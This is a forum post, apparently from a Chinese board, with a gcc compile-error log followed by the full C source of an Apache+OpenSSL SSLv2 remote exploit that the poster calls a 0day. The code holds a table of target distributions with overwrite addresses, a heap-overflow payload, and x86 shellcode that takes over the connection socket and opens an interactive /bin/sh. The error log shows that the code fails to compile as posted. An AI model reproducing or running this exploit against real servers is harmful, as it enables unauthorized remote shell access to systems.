C:\cygwin\bin>gcc -o 123 123.c
123.c:239: error: parse error before "RC4_KEY"
123.c:239: warning: no semicolon at end of struct or union
123.c:240: warning: data definition has no type or storage class
123.c:244: error: parse error before '}' token
123.c:244: warning: data definition has no type or storage class
123.c:316: error: parse error before '*' token
123.c: In function `ssl_connect_host':
123.c:317: error: `ssl' undeclared (first use in this function)
123.c:317: error: (Each undeclared identifier is reported only once
123.c:317: error: for each function it appears in.)
123.c:318: error: parse error before ')' token
123.c: At top level:
123.c:338: error: parse error before '*' token
123.c: In function `read_ssl_packet':
123.c:340: error: `ssl' undeclared (first use in this function)
123.c:340: error: `buf' undeclared (first use in this function)
123.c:350: error: `buf_size' undeclared (first use in this function)
123.c:353: error: `MD5_DIGEST_LENGTH' undeclared (first use in this function)
123.c: At top level:
123.c:368: error: parse error before '*' token
123.c: In function `send_ssl_packet':
123.c:372: error: `MD5_CTX' undeclared (first use in this function)
123.c:372: error: parse error before "ctx"
123.c:374: error: `ssl' undeclared (first use in this function)
123.c:374: error: `rec_len' undeclared (first use in this function)
123.c:374: error: `MD5_DIGEST_LENGTH' undeclared (first use in this function)
123.c:387: error: `ctx' undeclared (first use in this function)
123.c:389: error: `rec' undeclared (first use in this function)
123.c: At top level:
123.c:406: error: parse error before '*' token
123.c: In function `send_client_hello':
123.c:418: error: `ssl' undeclared (first use in this function)
123.c: At top level:
123.c:423: error: parse error before '*' token
123.c: In function `get_server_hello':
123.c:430: error: `ssl' undeclared (first use in this function)
123.c:447: warning: passing arg 2 of `d2i_X509' from incompatible pointer type
123.c: At top level:
123.c:462: error: parse error before '*' token
123.c: In function `send_client_master_key':
123.c:474: error: `ssl' undeclared (first use in this function)
123.c:481: error: `key_arg_overwrite' undeclared (first use in this function)
123.c:483: error: `key_arg_overwrite_len' undeclared (first use in this function
)
123.c: At top level:
123.c:495: error: parse error before '*' token
123.c: In function `generate_key_material':
123.c:497: error: `MD5_CTX' undeclared (first use in this function)
123.c:497: error: parse error before "ctx"
123.c:500: error: `ssl' undeclared (first use in this function)
123.c:501: error: `MD5_DIGEST_LENGTH' undeclared (first use in this function)
123.c:502: error: `ctx' undeclared (first use in this function)
123.c: At top level:
123.c:513: error: parse error before '*' token
123.c: In function `generate_session_keys':
123.c:514: error: `ssl' undeclared (first use in this function)
123.c:516: error: `RC4_KEY' undeclared (first use in this function)
123.c:516: error: parse error before ')' token
123.c:519: error: parse error before ')' token
123.c: At top level:
123.c:523: error: parse error before '*' token
123.c: In function `get_server_verify':
123.c:526: error: `ssl' undeclared (first use in this function)
123.c: At top level:
123.c:532: error: parse error before '*' token
123.c: In function `send_client_finished':
123.c:535: error: `ssl' undeclared (first use in this function)
123.c: At top level:
123.c:539: error: parse error before '*' token
123.c: In function `get_server_finished':
123.c:543: error: `ssl' undeclared (first use in this function)
123.c: At top level:
123.c:550: error: parse error before '*' token
123.c: In function `get_server_error':
123.c:553: error: `ssl' undeclared (first use in this function)
123.c: In function `exploit':
123.c:560: error: `ssl1' undeclared (first use in this function)
123.c:561: error: `ssl2' undeclared (first use in this function)
C:\cygwin\bin>
以下是源文件,是OPEN-SSL 的源码0DAY
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <fcntl.h>
#include <stdlib.h>
#include <stdarg.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/time.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <arpa/telnet.h>
#include <sys/wait.h>
#include <signal.h>
#include <openssl/ssl.h>
#include <openssl/rsa.h>
#include <openssl/x509.h>
#include <openssl/evp.h>
unsigned long myip=0;
void conv(char *str,int len,unsigned long server) {
memset(str,0,len);
strcpy(str,(char*)inet_ntoa(*(struct in_addr*)&server));
}
void cleanup(char *buf) {
while(buf[strlen(buf)-1] == '\n' || buf[strlen(buf)-1] == '\r' || buf[strlen(buf)-1] == ' ') buf[strlen(buf)-1] = 0;
while(*buf == '\n' || *buf == '\r' || *buf == ' ') {
unsigned long i;
for (i=strlen(buf)+1;i>0;i--) buf[i-1]=buf[i];
}
}
char *GetAddress(char *ip) {
struct sockaddr_in sin;
fd_set fds;
int n,d,sock;
char buf[1024];
struct timeval tv;
sock = socket(PF_INET, SOCK_STREAM, 0);
sin.sin_family = PF_INET;
sin.sin_addr.s_addr = inet_addr(ip);
sin.sin_port = htons(80);
if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) return NULL;
write(sock,"GET / HTTP/1.1\r\n\r\n",strlen("GET / HTTP/1.1\r\n\r\n"));
tv.tv_sec = 15;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(sock, &fds);
memset(buf, 0, sizeof(buf));
if(select(sock + 1, &fds, NULL, NULL, &tv) > 0) {
if(FD_ISSET(sock, &fds)) {
if((n = read(sock, buf, sizeof(buf) - 1)) < 0) return NULL;
for (d=0;d<n;d++) if (!strncmp(buf+d,"Server: ",strlen("Server: "))) {
char *start=buf+d+strlen("Server: ");
for (d=0;d<strlen(start);d++) if (start[d] == '\n') start[d]=0;
cleanup(start);
return strdup(start);
}
}
}
return NULL;
}
#define ENC(c) ((c) ? ((c) & 077) + ' ': '`')
int sendch(int sock,int buf) {
char a[2];
int b=1;
if (buf == '`' || buf == '\\' || buf == '$') {
a[0]='\\';
a[1]=0;
b=write(sock,a,1);
}
if (b <= 0) return b;
a[0]=buf;
a[1]=0;
return write(sock,a,1);
}
int writem(int sock, char *str) {
return write(sock,str,strlen(str));
}
#define MAX_ARCH 21
struct archs {
char *os;
char *apache;
int func_addr;
} architectures[] = {
{"Gentoo", "1.3.24-r2", 0x08086c34},
{"Debian Woody GNU/Linux 3.0", "1.3.26", 0x080863cc},
{"Red-Hat 6.0", "1.3.6", 0x080707ec},
{"Red-Hat 6.1", "1.3.9", 0x0808ccc4},
{"Red-Hat 6.2", "1.3.12", 0x0808f614},
{"Red-Hat 7.0", "1.3.12", 0x0809251c},
{"Red-Hat 7.1", "1.3.19", 0x0809af8c},
{"Red-Hat 7.2", "1.3.20", 0x080994d4},
{"Redhat Linux 7.2 (apache-1.3.26 w/PHP)", "1.3.26", 0x08269988},
{"Red-Hat 7.3", "1.3.26", 0x08161c14},
{"Red-Hat 7.3", "1.3.23", 0x0808528c},
{"Red-Hat", "1.3.22", 0x0808400c},
{"SuSE Linux 7.0", "1.3.12", 0x0809f54c},
{"SuSE Linux 7.1", "1.3.17", 0x08099984},
{"SuSE Linux 7.2", "1.3.19", 0x08099ec8},
{"SuSE Linux 7.3", "1.3.20", 0x08099da8},
{"SuSE Linux 8.0", "1.3.23", 0x08086168},
{"SuSE Linux 8.0#", "1.3.23", 0x080861c8},
{"Mandrake Linux 7.1", "1.3.14", 0x0809d6c4},
{"Mandrake Linux 8.0", "1.3.19", 0x0809ea98},
{"Mandrake Linux 8.1", "1.3.20", 0x0809e97c},
{"Mandrake Linux 8.2", "1.3.23", 0x08086580},
{"Slackware 7.0", "1.3.26", 0x083d37fc},
{"Slackware 8.1-stable", "1.3.26",0x080b2100},
{NULL, NULL,0},
};
extern int errno;
int cipher;
int ciphers;
#define FINDSCKPORTOFS 208 + 12 + 46
unsigned char overwrite_session_id_length[] =
"AAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"\x70\x00\x00\x00";
unsigned char overwrite_next_chunk[] =
"AAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAA"
"\x00\x00\x00\x00"
"\x00\x00\x00\x00"
"AAAA"
"\x01\x00\x00\x00"
"AAAA"
"AAAA"
"AAAA"
"\x00\x00\x00\x00"
"AAAA"
"\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"AAAAAAAA"
"\x00\x00\x00\x00"
"\x11\x00\x00\x00"
"fdfd"
"bkbk"
"\x10\x00\x00\x00"
"\x10\x00\x00\x00"
"\xeb\x0a\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x31\xdb"
"\x89\xe7"
"\x8d\x77\x10"
"\x89\x77\x04"
"\x8d\x4f\x20"
"\x89\x4f\x08"
"\xb3\x10"
"\x89\x19"
"\x31\xc9"
"\xb1\xff"
"\x89\x0f"
"\x51"
"\x31\xc0"
"\xb0\x66"
"\xb3\x07"
"\x89\xf9"
"\xcd\x80"
"\x59"
"\x31\xdb"
"\x39\xd8"
"\x75\x0a"
"\x66\xb8\x12\x34"
"\x66\x39\x46\x02"
"\x74\x02"
"\xe2\xe0"
"\x89\xcb"
"\x31\xc9"
"\xb1\x03"
"\x31\xc0"
"\xb0\x3f"
"\x49"
"\xcd\x80"
"\x41"
"\xe2\xf6"
"\x31\xc9"
"\xf7\xe1"
"\x51"
"\x5b"
"\xb0\xa4"
"\xcd\x80"
"\x31\xc0"
"\x50"
"\x68""//sh"
"\x68""/bin"
"\x89\xe3"
"\x50"
"\x53"
"\x89\xe1"
"\x99"
"\xb0\x0b"
"\xcd\x80";
#define BUFSIZE 16384
#define CHALLENGE_LENGTH 16
#define RC4_KEY_LENGTH 16
#define RC4_KEY_MATERIAL_LENGTH (RC4_KEY_LENGTH*2)
#define n2s(c,s) ((s=(((unsigned int)(c[0]))<< 8)| (((unsigned int)(c[1])) )),c+=2)
#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), c[1]=(unsigned char)(((s) )&0xff)),c+=2)
typedef struct {
int sock;
unsigned char challenge[CHALLENGE_LENGTH];
unsigned char master_key[RC4_KEY_LENGTH];
unsigned char key_material[RC4_KEY_MATERIAL_LENGTH];
int conn_id_length;
unsigned char conn_id[SSL2_MAX_CONNECTION_ID_LENGTH];
X509 *x509;
unsigned char* read_key;
unsigned char* write_key;
RC4_KEY* rc4_read_key;
RC4_KEY* rc4_write_key;
int read_seq;
int write_seq;
int encrypted;
} ssl_conn;
long getip(char *hostname) {
struct hostent *he;
long ipaddr;
if ((ipaddr = inet_addr(hostname)) < 0) {
if ((he = gethostbyname(hostname)) == NULL) exit(-1);
memcpy(&ipaddr, he->h_addr, he->h_length);
}
return ipaddr;
}
int sh(int sock) {
char localip[256], rcv[1024];
fd_set rset;
int maxfd, n;
sleep(2);
write(sock, "uname -a;id\n", strlen("uname -a;id\n"));
while (1) {
fd_set fds;
int n;
struct timeval tv;
char buf[1024];
tv.tv_sec = 5;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(0, &fds);
FD_SET(sock, &fds);
memset(buf, 0, sizeof(buf));
if(select(sock + 1, &fds, NULL, NULL, &tv) > 0) {
if(FD_ISSET(sock, &fds)) {
if((n = read(sock, buf, sizeof(buf) - 1)) <= 0)
break;
write(1, buf, n);
}
if(FD_ISSET(0, &fds)) {
if((n = read(0, buf, sizeof(buf) - 1)) < 0)
exit(1);
write(sock, buf, n);
}
}//end select
}//end while
}
int get_local_port(int sock) {
struct sockaddr_in s_in;
unsigned int namelen = sizeof(s_in);
if (getsockname(sock, (struct sockaddr *)&s_in, &namelen) < 0) exit(1);
return s_in.sin_port;
}
int connect_host(char* host, int port) {
struct sockaddr_in s_in;
int sock;
s_in.sin_family = AF_INET;
s_in.sin_addr.s_addr = getip(host);
s_in.sin_port = htons(port);
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) <= 0) exit(1);
alarm(10);
if (connect(sock, (struct sockaddr *)&s_in, sizeof(s_in)) < 0) exit(1);
alarm(0);
return sock;
}
ssl_conn* ssl_connect_host(char* host, int port) {
ssl_conn* ssl;
if (!(ssl = (ssl_conn*) malloc(sizeof(ssl_conn)))) exit(1);
ssl->encrypted = 0;
ssl->write_seq = 0;
ssl->read_seq = 0;
ssl->sock = connect_host(host, port);
return ssl;
}
char res_buf[30];
int read_data(int sock, unsigned char* buf, int len) {
int l;
int to_read = len;
do {
if ((l = read(sock, buf, to_read)) < 0) exit(1);
to_read -= len;
} while (to_read > 0);
return len;
}
int read_ssl_packet(ssl_conn* ssl, unsigned char* buf, int buf_size) {
int rec_len, padding;
read_data(ssl->sock, buf, 2);
if ((buf[0] & 0x80) == 0) {
rec_len = ((buf[0] & 0x3f) << 8) | buf[1];
read_data(ssl->sock, &buf[2], 1);
padding = (int)buf[2];
}
else {
rec_len = ((buf[0] & 0x7f) << 8) | buf[1];
padding = 0;
}
if ((rec_len <= 0) || (rec_len > buf_size)) exit(1);
read_data(ssl->sock, buf, rec_len);
if (ssl->encrypted) {
if (MD5_DIGEST_LENGTH + padding >= rec_len) {
if ((buf[0] == SSL2_MT_ERROR) && (rec_len == 3)) return 0;
else exit(1);
}
RC4(ssl->rc4_read_key, rec_len, buf, buf);
rec_len = rec_len - MD5_DIGEST_LENGTH - padding;
memmove(buf, buf + MD5_DIGEST_LENGTH, rec_len);
}
if (buf[0] == SSL2_MT_ERROR) {
if (rec_len != 3) exit(1);
else return 0;
}
return rec_len;
}
void send_ssl_packet(ssl_conn* ssl, unsigned char* rec, int rec_len) {
unsigned char buf[BUFSIZE];
unsigned char* p;
int tot_len;
MD5_CTX ctx;
int seq;
if (ssl->encrypted) tot_len = rec_len + MD5_DIGEST_LENGTH;
else tot_len = rec_len;
if (2 + tot_len > BUFSIZE) exit(1);
p = buf;
s2n(tot_len, p);
buf[0] = buf[0] | 0x80;
if (ssl->encrypted) {
seq = ntohl(ssl->write_seq);
MD5_Init(&ctx);
MD5_Update(&ctx, ssl->write_key, RC4_KEY_LENGTH);
MD5_Update(&ctx, rec, rec_len);
MD5_Update(&ctx, &seq, 4);
MD5_Final(p, &ctx);
p+=MD5_DIGEST_LENGTH;
memcpy(p, rec, rec_len);
RC4(ssl->rc4_write_key, tot_len, &buf[2], &buf[2]);
}
else memcpy(p, rec, rec_len);
send(ssl->sock, buf, 2 + tot_len, 0);
ssl->write_seq++;
}
void send_client_hello(ssl_conn *ssl) {
int i;
unsigned char buf[BUFSIZE] =
"\x01"
"\x00\x02"
"\x00\x18"
"\x00\x00"
"\x00\x10"
"\x07\x00\xc0\x05\x00\x80\x03\x00"
"\x80\x01\x00\x80\x08\x00\x80\x06"
"\x00\x40\x04\x00\x80\x02\x00\x80"
"";
for (i = 0; i < CHALLENGE_LENGTH; i++) ssl->challenge[i] = (unsigned char) (rand() >> 24);
memcpy(&buf[33], ssl->challenge, CHALLENGE_LENGTH);
send_ssl_packet(ssl, buf, 33 + CHALLENGE_LENGTH);
}
void get_server_hello(ssl_conn* ssl) {
unsigned char buf[BUFSIZE];
unsigned char *p, *end;
int len;
int server_version, cert_length, cs_length, conn_id_length;
int found;
if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) exit(1);
if (len < 11) exit(1);
p = buf;
if (*(p++) != SSL2_MT_SERVER_HELLO) exit(1);
if (*(p++) != 0) exit(1);
if (*(p++) != 1) exit(1);
n2s(p, server_version);
if (server_version != 2) exit(1);
n2s(p, cert_length);
n2s(p, cs_length);
n2s(p, conn_id_length);
if (len != 11 + cert_length + cs_length + conn_id_length) exit(1);
ssl->x509 = NULL;
ssl->x509=d2i_X509(NULL,&p,(long)cert_length);
if (ssl->x509 == NULL) exit(1);
if (cs_length % 3 != 0) exit(1);
found = 0;
for (end=p+cs_length; p < end; p += 3) if ((p[0] == 0x01) && (p[1] == 0x00) && (p[2] == 0x80)) found = 1;
if (!found) exit(1);
if (conn_id_length > SSL2_MAX_CONNECTION_ID_LENGTH) exit(1);
ssl->conn_id_length = conn_id_length;
memcpy(ssl->conn_id, p, conn_id_length);
}
void send_client_master_key(ssl_conn* ssl, unsigned char* key_arg_overwrite, int key_arg_overwrite_len) {
int encrypted_key_length, key_arg_length, record_length;
unsigned char* p;
int i;
EVP_PKEY *pkey=NULL;
unsigned char buf[BUFSIZE] =
"\x02"
"\x01\x00\x80"
"\x00\x00"
"\x00\x40"
"\x00\x08";
p = &buf[10];
for (i = 0; i < RC4_KEY_LENGTH; i++) ssl->master_key[i] = (unsigned char) (rand() >> 24);
pkey=X509_get_pubkey(ssl->x509);
if (!pkey) exit(1);
if (pkey->type != EVP_PKEY_RSA) exit(1);
encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], pkey->pkey.rsa, RSA_PKCS1_PADDING);
if (encrypted_key_length <= 0) exit(1);
p += encrypted_key_length;
if (key_arg_overwrite) {
for (i = 0; i < 8; i++) *(p++) = (unsigned char) (rand() >> 24);
memcpy(p, key_arg_overwrite, key_arg_overwrite_len);
key_arg_length = 8 + key_arg_overwrite_len;
}
else key_arg_length = 0;
p = &buf[6];
s2n(encrypted_key_length, p);
s2n(key_arg_length, p);
record_length = 10 + encrypted_key_length + key_arg_length;
send_ssl_packet(ssl, buf, record_length);
ssl->encrypted = 1;
}
void generate_key_material(ssl_conn* ssl) {
unsigned int i;
MD5_CTX ctx;
unsigned char *km;
unsigned char c='0';
km=ssl->key_material;
for (i=0; i<RC4_KEY_MATERIAL_LENGTH; i+=MD5_DIGEST_LENGTH) {
MD5_Init(&ctx);
MD5_Update(&ctx,ssl->master_key,RC4_KEY_LENGTH);
MD5_Update(&ctx,&c,1);
c++;
MD5_Update(&ctx,ssl->challenge,CHALLENGE_LENGTH);
MD5_Update(&ctx,ssl->conn_id, ssl->conn_id_length);
MD5_Final(km,&ctx);
km+=MD5_DIGEST_LENGTH;
}
}
void generate_session_keys(ssl_conn* ssl) {
generate_key_material(ssl);
ssl->read_key = &(ssl->key_material[0]);
ssl->rc4_read_key = (RC4_KEY*) malloc(sizeof(RC4_KEY));
RC4_set_key(ssl->rc4_read_key, RC4_KEY_LENGTH, ssl->read_key);
ssl->write_key = &(ssl->key_material[RC4_KEY_LENGTH]);
ssl->rc4_write_key = (RC4_KEY*) malloc(sizeof(RC4_KEY));
RC4_set_key(ssl->rc4_write_key, RC4_KEY_LENGTH, ssl->write_key);
}
void get_server_verify(ssl_conn* ssl) {
unsigned char buf[BUFSIZE];
int len;
if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) exit(1);
if (len != 1 + CHALLENGE_LENGTH) exit(1);
if (buf[0] != SSL2_MT_SERVER_VERIFY) exit(1);
if (memcmp(ssl->challenge, &buf[1], CHALLENGE_LENGTH)) exit(1);
}
void send_client_finished(ssl_conn* ssl) {
unsigned char buf[BUFSIZE];
buf[0] = SSL2_MT_CLIENT_FINISHED;
memcpy(&buf[1], ssl->conn_id, ssl->conn_id_length);
send_ssl_packet(ssl, buf, 1+ssl->conn_id_length);
}
void get_server_finished(ssl_conn* ssl) {
unsigned char buf[BUFSIZE];
int len;
int i;
if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) exit(1);
if (buf[0] != SSL2_MT_SERVER_FINISHED) exit(1);
if (len <= 112) exit(1);
cipher = *(int*)&buf[101];
ciphers = *(int*)&buf[109];
}
void get_server_error(ssl_conn* ssl) {
unsigned char buf[BUFSIZE];
int len;
if ((len = read_ssl_packet(ssl, buf, sizeof(buf))) > 0) exit(1);
}
void exploit(int os,char *ip,int port) {
int i;
int arch=-1;
int N = 20;
ssl_conn* ssl1;
ssl_conn* ssl2;
char *a;
alarm(3600);
arch = os ;
if (os ==-1)
{
if ((a=GetAddress(ip)) == NULL) exit(0);
if (strncmp(a,"Apache",6)) exit(0);
for (i=0;architectures[i].os!=NULL;i++) {
if (strstr(a,architectures[i].apache) && strstr(a,architectures[i].os)) {
arch=i;
break;
}
}
if (arch == -1) arch=10;
}
srand(0x31337);
for (i=0; i<N; i++) {
connect_host(ip, port);
usleep(100000);
}
ssl1 = ssl_connect_host(ip, port);
ssl2 = ssl_connect_host(ip, port);
send_client_hello(ssl1);
get_server_hello(ssl1);
send_client_master_key(ssl1, overwrite_session_id_length, sizeof(overwrite_session_id_length)-1);
generate_session_keys(ssl1);
get_server_verify(ssl1);
send_client_finished(ssl1);
get_server_finished(ssl1);
port = get_local_port(ssl2->sock);
overwrite_next_chunk[FINDSCKPORTOFS] = (char) (port & 0xff);
overwrite_next_chunk[FINDSCKPORTOFS+1] = (char) ((port >> 8) & 0xff);
*(int*)&overwrite_next_chunk[156] = cipher;
*(int*)&overwrite_next_chunk[192] = architectures[arch].func_addr - 12;
*(int*)&overwrite_next_chunk[196] = ciphers + 16;
send_client_hello(ssl2);
get_server_hello(ssl2);
send_client_master_key(ssl2, overwrite_next_chunk, sizeof(overwrite_next_chunk)-1);
generate_session_keys(ssl2);
get_server_verify(ssl2);
for (i = 0; i < ssl2->conn_id_length; i++) ssl2->conn_id[i] = (unsigned char) (rand() >> 24);
send_client_finished(ssl2);
get_server_error(ssl2);
sh(ssl2->sock);
close(ssl2->sock);
close(ssl1->sock);
exit(0);
}
int main(int argc, char * argv[])
{
int port = 443;
int os,i;
if (argc < 3)
{
printf("APACHE + OPENSSL EXPLOIT\n\n");
for (i=0;architectures[i].os!=NULL;i++)
printf("target %d %s %s %p\n",i,architectures[i].os,architectures[i].apache,architectures[i].func_addr);
printf("\n");
printf("usage:%s target hostip [port]\n",argv[0]);
printf("usage:%s auto hostip [port] to auto select target\n",argv[0]);
exit(0);
}
if (argc >3 )
{
port = atoi(argv[3]);
}
if (strcmp("auto",argv[1])==0)
os = -1;
else os =atoi(argv[1]);
exploit(os,argv[2],port);
return 0;
}
[此贴子已经被作者于2007-7-23 19:27:09编辑过]